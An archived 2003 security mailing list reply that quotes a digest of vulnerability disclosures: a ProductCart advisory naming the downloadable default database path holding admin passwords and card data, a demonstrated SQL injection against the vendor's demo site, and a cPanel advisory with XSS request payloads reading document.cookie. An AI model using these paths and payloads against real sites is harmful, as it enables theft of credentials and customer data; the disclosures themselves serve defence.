Re: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #933 - 11 msgs

From: security snot (booger_at_unixclan.net)
Date: 07/06/03

Next message: Rick: "[Full-Disclosure] rundll32.exe buffer overflow"

Previous message: Markus Nielsen: "[Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #933 - 11 msgs"
In reply to: Markus Nielsen: "[Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #933 - 11 msgs"
Next in thread: petard: "[Full-Disclosure] digest annoyances"
Reply: petard: "[Full-Disclosure] digest annoyances"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: Markus Nielsen <intercool@sexmagnet.com>
Date: Sun, 6 Jul 2003 11:31:21 -0700 (PDT)

Guys -

Could we please limit the length of included replies on this list, to
something sane? Quoting the entire thread is very annoying.

Thanks.

-----------------------------------------------------------
"Whitehat by day, booger at night - I'm the security snot."
- CISSP / CCNA / A+ Certified - www.unixclan.net/~booger/ -
-----------------------------------------------------------

On Sun, 6 Jul 2003, Markus Nielsen wrote:

> On Sun, 2003-07-06 at 16:00, full-disclosure-request@lists.netsys.com
> wrote:
> > Send Full-Disclosure mailing list submissions to
> > full-disclosure@lists.netsys.com
> >
> > To subscribe or unsubscribe via the World Wide Web, visit
> > http://lists.netsys.com/mailman/listinfo/full-disclosure
> > or, via email, send a message with subject or body 'help' to
> > full-disclosure-request@lists.netsys.com
> >
> > You can reach the person managing the list at
> > full-disclosure-admin@lists.netsys.com
> >
> > When replying, please edit your Subject line so it is more specific
> > than "Re: Contents of Full-Disclosure digest..."
> >
> >
> > Today's Topics:
> >
> > 1. [Vulnerability] : ProductCart database file can be downloaded remotely (Tri Huynh)
> > 2. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (gyrniff)
> > 3. Re: [Vulnerability] : ProductCart database file
> > can be downloaded remotely (KF)
> > 4. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (morning_wood)
> > 5. cPanel Malicious HTML Tags Injection Vulnerability (Ory Segal)
> > 6. cPanel Malicious HTML Tags Injection Vulnerability (Ory Segal)
> > 7. Re: tripbid secure codes (Dave Korn)
> > 8. Re: [Vulnerability] : ProductCart database file
> > can be downloaded remotely (Larry W. Cashdollar)
> > 9. Re: Microsoft Cries Wolf ( again ) (Kristian Hermansen)
> >
> > --__--__--
> >
> > Message: 1
> > From: "Tri Huynh" <trihuynh@zeeup.com>
> > To: <bugtraq@securityfocus.com>
> > Cc: <full-disclosure@lists.netsys.com>
> > Date: Sat, 5 Jul 2003 13:07:51 -0700
> > Subject: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
> >
> > This is a multi-part message in MIME format.
> >
> > ------=_NextPart_000_0053_01C342F6.70CDCF30
> > Content-Type: text/plain;
> > charset="iso-8859-1"
> > Content-Transfer-Encoding: quoted-printable
> >
> > ProductCart database file can be downloaded remotely
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
> >
> > PROGRAM: ProductCart
> > HOMEPAGE: http://www.earlyimpact.com/productcart/
> > VULNERABLE VERSIONS: 1.0 to 2.0
> > RISK: High
> >
> >
> > DESCRIPTION
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
> >
> > ProductCart=AE is an ASP shopping cart that combines sophisticated=20
> > ecommerce features with time-saving store management tools and =
> > remarkable=20
> > ease of use. It is widely used by many e-commerce sites.
> >
> > DETAILS
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
> >
> > In the default installation, product cart database file is located at=20
> > /productcart/database/EIPC.mdb which can be accessed easily
> > by any remote attackers.
> >
> > Sample: http://victimhost/productcart/database/EIPC.mdb
> >
> > The database file includes the store administration password as well as=20
> > customer's info (including credit card info).=20
> > =20
> >
> > WORKAROUND
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
> >
> > Rename the database file, put it in a protected directory.
> >
> >
> > CREDITS
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
> >
> > Discovered by Tri Huynh from Sentry Union
> >
> >
> > DISLAIMER
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
> >
> > The information within this paper may change without notice. Use of
> > this information constitutes acceptance for use in an AS IS condition.
> > There are NO warranties with regard to this information. In no event
> > shall the author be liable for any damages whatsoever arising out of
> > or in connection with the use or spread of this information. Any use
> > of this information is at the user's own risk.
> >
> >
> > FEEDBACK
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
> >
> > Please send suggestions, updates, and comments to: trihuynh@zeeup.com
> >
> >
> >
> >
> > ------=_NextPart_000_0053_01C342F6.70CDCF30
> > Content-Type: text/html;
> > charset="iso-8859-1"
> > Content-Transfer-Encoding: quoted-printable
> >
> > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
> > <HTML><HEAD>
> > <META http-equiv=3DContent-Type content=3D"text/html; =
> > charset=3Diso-8859-1">
> > <META content=3D"MSHTML 6.00.2800.1106" name=3DGENERATOR>
> > <STYLE></STYLE>
> > </HEAD>
> > <BODY bgColor=3D#ffffff>
> > <DIV>ProductCart =
> > database file can=20
> > be downloaded=20
> > remotely =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D PROGRAM:=20
> > ProductCart</DIV>
> > <DIV>HOMEPAGE: <A=20
> > href=3D"http://www.earlyimpact.com/productcart/">http://www.earlyimpact.c=
> > om/productcart/</A> VULNERABLE=20
> > VERSIONS: 1.0 to 2.0</DIV>
> > <DIV>RISK: High</DIV> > face=3DArial size=3D2>
> > <DIV>  </DIV>
> > <DIV>DESCRIPTION =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D ProductCart=AE=20
> > is an ASP shopping cart that combines sophisticated </DIV>
> > <DIV>ecommerce features with time-saving store management tools and =
> >
> > remarkable </DIV>
> > <DIV>ease of use. It is widely used by many e-commerce=20
> > sites. DETAILS =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D In=20
> > the default installation, product cart database file is located at =
> > </DIV>
> > <DIV>/productcart/database/EIPC.mdb which can be accessed easily</DIV>
> > <DIV>by any remote attackers.</DIV>
> > <DIV> </DIV>
> > <DIV>Sample: <A=20
> > href=3D"http://victimhost/productcart/database/EIPC.mdb">http://victimhos=
> > t/productcart/database/EIPC.mdb</A></DIV>
> > <DIV> </DIV>
> > <DIV>The database file includes the store administration password as =
> > well as=20
> > </DIV>
> > <DIV>customer's info (including credit card info). </DIV>
> > <DIV>  =20
> > WORKAROUND =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D Rename=20
> > the database file, put it in a protected=20
> > directory. CREDITS =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Discovered=20
> > by Tri Huynh from Sentry Union</DIV>
> > <DIV> DISLAIMER =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D The=20
> > information within this paper may change without notice. Use of this=20
> > information constitutes acceptance for use in an AS IS =
> > condition. There are=20
> > NO warranties with regard to this information. In no event shall the =
> > author=20
> > be liable for any damages whatsoever arising out of or in connection =
> > with the=20
> > use or spread of this information. Any use of this information is at =
> > the=20
> > user's own=20
> > risk. FEEDBACK =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D Please=20
> > send suggestions, updates, and comments to: <A=20
> > href=3D"mailto:trihuynh@zeeup.com">trihuynh@zeeup.com</A> =
> > </DIV></BODY></HTML>
> >
> > ------=_NextPart_000_0053_01C342F6.70CDCF30--
> >
> >
> > --__--__--
> >
> > Message: 2
> > From: gyrniff <b240503@gyrniff.dk>
> > To: full-disclosure@lists.netsys.com
> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
> > Date: Sat, 5 Jul 2003 19:37:41 +0200
> >
> > URL:
> > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
> > Change the name Paul to Paul'
> >
> > Microsoft OLE DB Provider for ODBC Drivers
> > error '80040e14'
> > [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in
> > query expression ''Paul'',lastName='Smith',customerCompany='Early Impact',
> > address='3226 Colorado Ave', city='Santa Monica', zip='90004',
> > stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
> > /productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36
> >
> > have a nice weekend ;-)
> >
> > On Saturday 05 July 2003 22:07, Tri Huynh wrote:
> > > ProductCart database file can be downloaded remotely
> > > =================================================
> > >
> > > PROGRAM: ProductCart
> > > HOMEPAGE: http://www.earlyimpact.com/productcart/
> > > VULNERABLE VERSIONS: 1.0 to 2.0
> > > RISK: High
> > >
> > >
> > > DESCRIPTION
> > > =================================================
> > >
> > > ProductCart� is an ASP shopping cart that combines sophisticated
> > > ecommerce features with time-saving store management tools and remarkable
> > > ease of use. It is widely used by many e-commerce sites.
> > >
> > > DETAILS
> > > =================================================
> > >
> > > In the default installation, product cart database file is located at
> > > /productcart/database/EIPC.mdb which can be accessed easily
> > > by any remote attackers.
> > >
> > > Sample: http://victimhost/productcart/database/EIPC.mdb
> > >
> > > The database file includes the store administration password as well as
> > > customer's info (including credit card info).
> > >
> > >
> > > WORKAROUND
> > > =================================================
> > >
> > > Rename the database file, put it in a protected directory.
> > >
> > >
> > > CREDITS
> > > =================================================
> > >
> > > Discovered by Tri Huynh from Sentry Union
> > >
> > >
> > > DISLAIMER
> > > =================================================
> > >
> > > The information within this paper may change without notice. Use of
> > > this information constitutes acceptance for use in an AS IS condition.
> > > There are NO warranties with regard to this information. In no event
> > > shall the author be liable for any damages whatsoever arising out of
> > > or in connection with the use or spread of this information. Any use
> > > of this information is at the user's own risk.
> > >
> > >
> > > FEEDBACK
> > > =================================================
> > >
> > > Please send suggestions, updates, and comments to: trihuynh@zeeup.com
> >
> >
> > --__--__--
> >
> > Message: 3
> > Date: Sat, 05 Jul 2003 15:30:28 -0400
> > From: KF <dotslash@snosoft.com>
> > To: gyrniff <b240503@gyrniff.dk>
> > CC: full-disclosure@lists.netsys.com
> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file
> > can be downloaded remotely
> >
> > Was that legit California data? I am sure than making someone have a
> > nice weekend you just made multiple someones have a shitty month ahead
> > of them...
> > http://www.theregister.co.uk/content/55/31509.html
> >
> > -KF
> >
> > gyrniff wrote:
> >
> > >URL:
> > >http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
> > >Change the name Paul to Paul'
> > >
> > >Microsoft OLE DB Provider for ODBC Drivers
> > > error '80040e14'
> > >[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in
> > >query expression ''Paul'',lastName='Smith',customerCompany='Early Impact',
> > >address='3226 Colorado Ave', city='Santa Monica', zip='90004',
> > >stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
> > >/productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36
> > >
> > >have a nice weekend ;-)
> > >
> > >On Saturday 05 July 2003 22:07, Tri Huynh wrote:
> > >
> > >
> > >>ProductCart database file can be downloaded remotely
> > >>=================================================
> > >>
> > >>PROGRAM: ProductCart
> > >>HOMEPAGE: http://www.earlyimpact.com/productcart/
> > >>VULNERABLE VERSIONS: 1.0 to 2.0
> > >>RISK: High
> > >>
> > >>
> > >>DESCRIPTION
> > >>=================================================
> > >>
> > >>ProductCart� is an ASP shopping cart that combines sophisticated
> > >>ecommerce features with time-saving store management tools and remarkable
> > >>ease of use. It is widely used by many e-commerce sites.
> > >>
> > >>DETAILS
> > >>=================================================
> > >>
> > >>In the default installation, product cart database file is located at
> > >>/productcart/database/EIPC.mdb which can be accessed easily
> > >>by any remote attackers.
> > >>
> > >>Sample: http://victimhost/productcart/database/EIPC.mdb
> > >>
> > >>The database file includes the store administration password as well as
> > >>customer's info (including credit card info).
> > >>
> > >>
> > >> WORKAROUND
> > >>=================================================
> > >>
> > >>Rename the database file, put it in a protected directory.
> > >>
> > >>
> > >>CREDITS
> > >>=================================================
> > >>
> > >>Discovered by Tri Huynh from Sentry Union
> > >>
> > >>
> > >>DISLAIMER
> > >>=================================================
> > >>
> > >>The information within this paper may change without notice. Use of
> > >>this information constitutes acceptance for use in an AS IS condition.
> > >>There are NO warranties with regard to this information. In no event
> > >>shall the author be liable for any damages whatsoever arising out of
> > >>or in connection with the use or spread of this information. Any use
> > >>of this information is at the user's own risk.
> > >>
> > >>
> > >>FEEDBACK
> > >>=================================================
> > >>
> > >>Please send suggestions, updates, and comments to: trihuynh@zeeup.com
> > >>
> > >>
> > >
> > >_______________________________________________
> > >Full-Disclosure - We believe in it.
> > >Charter: http://lists.netsys.com/full-disclosure-charter.html
> > >
> > >
> > >
> >
> >
> >
> > --__--__--
> >
> > Message: 4
> > From: "morning_wood" <se_cur_ity@hotmail.com>
> > To: "gyrniff" <b240503@gyrniff.dk>, <full-disclosure@lists.netsys.com>
> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
> > Date: Sat, 5 Jul 2003 15:24:46 -0700
> >
> > vuln to XSS too..
> >
> > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/manageCategories.asp
> >
> > ----- Original Message -----
> > From: "gyrniff" <b240503@gyrniff.dk>
> > To: <full-disclosure@lists.netsys.com>
> > Sent: Saturday, July 05, 2003 10:37 AM
> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database
> > file can be downloaded remotely
> >
> >
> > > URL:
> > >
> > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
> > > Change the name Paul to Paul'
> > >
> > > Microsoft OLE DB Provider for ODBC Drivers
> > > error '80040e14'
> > > [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing
> > operator) in
> > > query expression ''Paul'',lastName='Smith',customerCompany='Early
> > Impact',
> > > address='3226 Colorado Ave', city='Santa Monica', zip='90004',
> > > stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE
> > idCustomer=115'.
> > > /productcart/build_to_order/productcart/pcadmin/processOrder.asp,
> > line 36
> > >
> > > have a nice weekend ;-)
> > >
> > > On Saturday 05 July 2003 22:07, Tri Huynh wrote:
> > > > ProductCart database file can be downloaded remotely
> > > > =================================================
> > > >
> > > > PROGRAM: ProductCart
> > > > HOMEPAGE: http://www.earlyimpact.com/productcart/
> > > > VULNERABLE VERSIONS: 1.0 to 2.0
> > > > RISK: High
> > > >
> > > >
> > > > DESCRIPTION
> > > > =================================================
> > > >
> > > > ProductCart� is an ASP shopping cart that combines sophisticated
> > > > ecommerce features with time-saving store management tools and
> > remarkable
> > > > ease of use. It is widely used by many e-commerce sites.
> > > >
> > > > DETAILS
> > > > =================================================
> > > >
> > > > In the default installation, product cart database file is located
> > at
> > > > /productcart/database/EIPC.mdb which can be accessed easily
> > > > by any remote attackers.
> > > >
> > > > Sample: http://victimhost/productcart/database/EIPC.mdb
> > > >
> > > > The database file includes the store administration password as
> > well as
> > > > customer's info (including credit card info).
> > > >
> > > >
> > > > WORKAROUND
> > > > =================================================
> > > >
> > > > Rename the database file, put it in a protected directory.
> > > >
> > > >
> > > > CREDITS
> > > > =================================================
> > > >
> > > > Discovered by Tri Huynh from Sentry Union
> > > >
> > > >
> > > > DISLAIMER
> > > > =================================================
> > > >
> > > > The information within this paper may change without notice. Use
> > of
> > > > this information constitutes acceptance for use in an AS IS
> > condition.
> > > > There are NO warranties with regard to this information. In no
> > event
> > > > shall the author be liable for any damages whatsoever arising out
> > of
> > > > or in connection with the use or spread of this information. Any
> > use
> > > > of this information is at the user's own risk.
> > > >
> > > >
> > > > FEEDBACK
> > > > =================================================
> > > >
> > > > Please send suggestions, updates, and comments to:
> > trihuynh@zeeup.com
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.netsys.com/full-disclosure-charter.html
> > >
> >
> > --__--__--
> >
> > Message: 5
> > From: Ory Segal <ORY.SEGAL@SANCTUMINC.COM>
> > To: "BugTraq (E-mail)" <BUGTRAQ@SECURITYFOCUS.COM>,
> > "Full Disclosure (E-mail)" <full-disclosure@lists.netsys.com>,
> > "WebAppSec (E-mail)" <webappsec@SECURITYFOCUS.COM>
> > Date: Sun, 6 Jul 2003 01:39:33 -0700
> > Subject: [Full-Disclosure] cPanel Malicious HTML Tags Injection Vulnerability
> >
> > This message is in MIME format. Since your mail reader does not understand
> > this format, some or all of this message may not be legible.
> >
> > ------_=_NextPart_001_01C3439A.1FBE84F0
> > Content-Type: text/plain;
> > charset="iso-8859-1"
> >
> > ////////////////////////////////////////////////////////////////////////////
> > ///
> > //==========================>> Security Advisory
> > <<==========================//
> > ////////////////////////////////////////////////////////////////////////////
> > ///
> >
> > ----------------------------------------------------------------------------
> > ---
> > -----[ cPanel Malicious HTML Tags Injection Vulnerability
> > ----------------------------------------------------------------------------
> > ---
> >
> > --[ Author: Ory Segal, Sanctum inc. http://www.SanctumInc.com
> > --[ Discovery Date: 06/17/2003 (Vendor was notified)
> > --[ Release Date: 07/06/2003
> > --[ Product: Tested on cPanel 6.4.2-STABLE
> > --[ Severity: Medium
> > --[ CVE: Not assigned yet
> >
> > --[ Summary
> >
> > From the vendor's web site:
> > "...The Cpanel interface is a client side interface, which allows your
> > customers
> > to easily control a web hosting account. With the touch of a button, they
> > can
> > add e-mail accounts, access their files, backup their files, setup a
> > shopping
> > cart, and more..."
> >
> > Web users can embed Malicious HTML tags in HTTP requests, which will later
> > be parsed by the web site administrator's browser, in several cPanel
> > screens.
> > This may lead to theft of cookies associated with the domain, or execution
> > of
> > client-side scripts in the administrator's browser.
> >
> > --[ Description
> >
> > The 'Error Log' and 'Latest Visitors' screens in cPanel, provide the web
> > site
> > administrator with HTTP request logs. These scripts do not sanitize the URL
> > part
> > of HTTP requests and present them to the administrator as is, thus, allowing
> > an
> > attacker to embed malicious HTML tags that will later be parsed and executed
> > by
> > the administrators browser.
> >
> > For example, lets take a look at the 'Error Log' screen:
> >
> > [From errlog.html]
> > ...
> > Last 300 Error Log Messages in reverse order:<hr>
> > <pre>
> > [Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist:
> > /home/dir/public_html/foobar.html
> > </pre>
> > ...
> >
> > The following request will present a pop-up screen with the cookies
> > that are currently associated with the domain:
> >
> > GET /<script>alert(document.cookie);</script> HTTP/1.0
> > Host: www.site.com
> >
> >
> > --[ Note
> >
> > The 'Latest Visitors' screen of the tested version (6.4.2-STABLE) presented
> > the
> > latest requests as HTML links, thus the malicious payload must terminate the
> > <a>
> > tag before opening a new one. For example:
> >
> > GET /"></a><script>alert(document.cookie);</script> HTTP/1.0
> > Host: www.site.com
> >
> > --[ Solution
> >
> > According to the vendor, the problem was fixed in version 7.0, which can be
> > downloaded at: http://www.cpanel.net/downloads.htm
> >
> >
> >
> >
> > Ory Segal
> > Senior Security Engineer
> > Sanctum, Inc.
> > http://www.SanctumInc.Com/
> >
> > Ampa Bldg., 1 Sapir Street.
> > Mail: P.O.Box 12047
> > Herzliya 46733, ISRAEL
> >
> > Tel: +972-9-9586077 Ext. 236
> > Fax: +972-9-9576337
> >
> >
> > ------_=_NextPart_001_01C3439A.1FBE84F0
> > Content-Type: text/html;
> > charset="iso-8859-1"
> > Content-Transfer-Encoding: quoted-printable
> >
> > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
> > <HTML>
> > <HEAD>
> > <META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; =
> > charset=3Diso-8859-1">
> > <META NAME=3D"Generator" CONTENT=3D"MS Exchange Server version =
> > 5.5.2653.12">
> > <TITLE>cPanel Malicious HTML Tags Injection Vulnerability</TITLE>
> > </HEAD>
> > <BODY>
> >
> > > SIZE=3D2>///////////////////////////////////////////////////////////////=
> > ////////////////
> > > SIZE=3D2>//=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D>> Security Advisory =
> > <<=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D//
> > > SIZE=3D2>///////////////////////////////////////////////////////////////=
> > ////////////////
> > 
> >
> > > SIZE=3D2>---------------------------------------------------------------=
> > ----------------
> > -----[ cPanel Malicious HTML Tags Injection =
> > Vulnerability
> > > SIZE=3D2>---------------------------------------------------------------=
> > ----------------
> > 
> >
> > --[ Author: Ory Segal, Sanctum inc. <A =
> > HREF=3D"http://www.SanctumInc.com" =
> > TARGET=3D"_blank">http://www.SanctumInc.com>
> > --[ Discovery Date: 06/17/2003 (Vendor was =
> > notified)
> > --[ Release Date: 07/06/2003 
> > --[ Product: Tested on cPanel 6.4.2-STABLE
> > --[ Severity: Medium
> > --[ CVE: Not assigned yet
> > 
> >
> > --[ Summary
> > 
> >
> > From the vendor's web site:
> > "...The Cpanel interface is a client side =
> > interface, which allows your customers 
> > to easily control a web hosting account. With the =
> > touch of a button, they can 
> > add e-mail accounts, access their files, backup =
> > their files, setup a shopping 
> > cart, and more..."
> > 
> >
> > Web users can embed Malicious HTML tags in HTTP =
> > requests, which will later 
> > be parsed by the web site administrator's browser, =
> > in several cPanel screens. 
> > This may lead to theft of cookies associated with =
> > the domain, or execution of 
> > client-side scripts in the administrator's =
> > browser.
> >  
> > --[ Description
> > 
> >
> > The 'Error Log' and 'Latest Visitors' screens in =
> > cPanel, provide the web site 
> > administrator with HTTP request logs. These scripts =
> > do not sanitize the URL part 
> > of HTTP requests and present them to the =
> > administrator as is, thus, allowing an 
> > attacker to embed malicious HTML tags that will =
> > later be parsed and executed by 
> > the administrators browser.
> > 
> >
> > For example, lets take a look at the 'Error Log' =
> > screen:
> > 
> >
> > [From errlog.html]
> > ...
> > Last 300 Error Log Messages in reverse =
> > order:<hr>
> > <pre>
> > [Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] =
> > File does not exist: 
> > /home/dir/public_html/foobar.html
> > </pre>
> > ...
> > 
> >
> > The following request will present a pop-up screen =
> > with the cookies 
> > that are currently associated with the =
> > domain:
> > 
> >
> >   GET =
> > /<script>alert(document.cookie);</script> HTTP/1.0
> >   Host: www.site.com
> > 
> > 
> >
> > --[ Note
> > 
> >
> > The 'Latest Visitors' screen of the tested version =
> > (6.4.2-STABLE) presented the 
> > latest requests as HTML links, thus the malicious =
> > payload must terminate the <a> 
> > tag before opening a new one. For example:
> > 
> >
> >   GET =
> > /"></a><script>alert(document.cookie);</script&gt=
> > ; HTTP/1.0
> >   Host: www.site.com
> > 
> >
> > --[ Solution
> > 
> >
> > According to the vendor, the problem was fixed in =
> > version 7.0, which can be 
> > downloaded at: <A =
> > HREF=3D"http://www.cpanel.net/downloads.htm" =
> > TARGET=3D"_blank">http://www.cpanel.net/downloads.htm>
> > 
> > 
> > 
> > 
> >
> > > SIZE=3D2>          Ory =
> > Segal
> >   Senior Security Engineer
> >         Sanctum, =
> > Inc.
> >  <A HREF=3D"http://www.SanctumInc.Com/" =
> > TARGET=3D"_blank">http://www.SanctumInc.Com/>
> > 
> >
> > Ampa Bldg.,  1 Sapir Street.
> > Mail:     =
> > P.O.Box      12047
> > Herzliya    46733,    =
> > ISRAEL
> > 
> >
> > Tel: +972-9-9586077 Ext. 236
> > Fax: +972-9-9576337
> > 
> >
> > </BODY>
> > </HTML>
> > ------_=_NextPart_001_01C3439A.1FBE84F0--
> >
> > --__--__--
> >
> > Message: 6
> > Date: Sun, 06 Jul 2003 11:46:44 +0300
> > From: Ory Segal <ory.segal@sanctuminc.com>
> > To: BUGTRAQ@SECURITYFOCUS.COM, full-disclosure@lists.netsys.com,
> > webappsec@SECURITYFOCUS.COM
> > Subject: [Full-Disclosure] cPanel Malicious HTML Tags Injection Vulnerability
> >
> > -------------------------------------------------------------------------------
> > -----[ cPanel Malicious HTML Tags Injection Vulnerability
> > -------------------------------------------------------------------------------
> >
> > --[ Author: Ory Segal, Sanctum inc. http://www.SanctumInc.com
> > --[ Discovery Date: 06/17/2003 (Vendor was notified)
> > --[ Release Date: 07/06/2003
> > --[ Product: Tested on cPanel 6.4.2-STABLE
> > --[ Severity: Medium
> > --[ CVE: Not assigned yet
> >
> > --[ Summary
> >
> > From the vendor's web site:
> > "...The Cpanel interface is a client side interface, which allows your
> > customers
> > to easily control a web hosting account. With the touch of a button,
> > they can
> > add e-mail accounts, access their files, backup their files, setup a
> > shopping
> > cart, and more..."
> >
> > Web users can embed Malicious HTML tags in HTTP requests, which will later
> > be parsed by the web site administrator's browser, in several cPanel
> > screens.
> > This may lead to theft of cookies associated with the domain, or
> > execution of
> > client-side scripts in the administrator's browser.
> >
> > --[ Description
> >
> > The 'Error Log' and 'Latest Visitors' screens in cPanel, provide the web
> > site
> > administrator with HTTP request logs. These scripts do not sanitize the
> > URL part
> > of HTTP requests and present them to the administrator as is, thus,
> > allowing an
> > attacker to embed malicious HTML tags that will later be parsed and
> > executed by
> > the administrators browser.
> >
> > For example, lets take a look at the 'Error Log' screen:
> >
> > [From errlog.html]
> > ...
> > Last 300 Error Log Messages in reverse order:<hr>
> > <pre>
> > [Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist:
> > /home/dir/public_html/foobar.html
> > </pre>
> > ...
> >
> > The following request will present a pop-up screen with the cookies
> > that are currently associated with the domain:
> >
> > GET /<script>alert(document.cookie);</script> HTTP/1.0
> > Host: www.site.com
> >
> >
> > --[ Note
> >
> > The 'Latest Visitors' screen of the tested version (6.4.2-STABLE)
> > presented the
> > latest requests as HTML links, thus the malicious payload must terminate
> > the <a>
> > tag before opening a new one. For example:
> >
> > GET /"></a><script>alert(document.cookie);</script> HTTP/1.0
> > Host: www.site.com
> >
> > --[ Solution
> >
> > According to the vendor, the problem was fixed in version 7.0, which can be
> > downloaded at: http://www.cpanel.net/downloads.htm
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
> > --__--__--
> >
> > Message: 7
> > From: "Dave Korn" <davek_throwaway@hotmail.com>
> > To: full-disclosure@lists.netsys.com
> > Subject: Re: [Full-Disclosure] tripbid secure codes
> > Date: Sun, 06 Jul 2003 12:23:01 +0000
> >
> >
> > ----- Original Message -----
> > From: <auto94042@hushmail.com>
> > To: <full-disclosure@lists.netsys.com>
